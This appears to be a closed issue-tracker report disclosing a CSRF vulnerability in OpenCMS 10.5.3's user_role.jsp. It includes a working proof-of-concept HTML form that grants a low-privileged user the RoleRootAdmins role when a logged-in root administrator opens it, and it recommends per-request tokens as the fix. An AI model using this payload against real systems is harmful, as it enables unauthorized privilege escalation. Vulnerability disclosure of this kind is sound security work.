Closed
Description
Hi Team, I would like to report Multiple CSRF vulnerability in latest version. mitre.org assigned new CVE for this vulnerabiliity.
Description:
Cross-site request forgery (CSRF) vulnerability in opencms/system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of unspecified victims for requests that perform privilege escalation.
Steps to Reproduce:
- Send below crafted request to logged in user who is having Root Administrator level access.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.146.131:8080/opencms/system/workplace/admin/accounts/user_role.jsp" method="POST">
<input type="hidden" name="dialogtype" value="" />
<input type="hidden" name="root" value="" />
<input type="hidden" name="sortcol" value="" />
<input type="hidden" name="preactiondone" value="" />
<input type="hidden" name="oufqn" value="" />
<input type="hidden" name="resource" value="" />
<input type="hidden" name="userid" value="replace with actual user id of low privileged user." />
<input type="hidden" name="closelink" value="%2Fopencms%2Fsystem%2Fworkplace%2Fviews%2Fadmin%2Fadmin-main.jsp%3Fpath%3D%2Faccounts%2Forgunit%2Fusers%26action%3Dinitial" />
<input type="hidden" name="framename" value="" />
<input type="hidden" name="ispopup" value="" />
<input type="hidden" name="originalparams" value="" />
<input type="hidden" name="message" value="" />
<input type="hidden" name="selitems" value="RoleRootAdmins" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="style" value="new" />
<input type="hidden" name="page" value="" />
<input type="hidden" name="base" value="" />
<input type="hidden" name="path" value="%2Faccounts%2Forgunit%2Fusers%2Fedit%2Frole" />
<input type="hidden" name="action" value="listmultiaction" />
<input type="hidden" name="searchfilter" value="" />
<input type="hidden" name="redirect" value="" />
<input type="hidden" name="force" value="" />
<input type="hidden" name="formname" value="lsre-form" />
<input type="hidden" name="listaction" value="ma" />
<input type="hidden" name="listMultiAction" value="RoleRootAdmins" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
Fix:
Implementation of random token in every state changing request will mitigate the issue.
Affected Version:
10.5.3 release
Metadata
Metadata
Assignees
Labels
No labels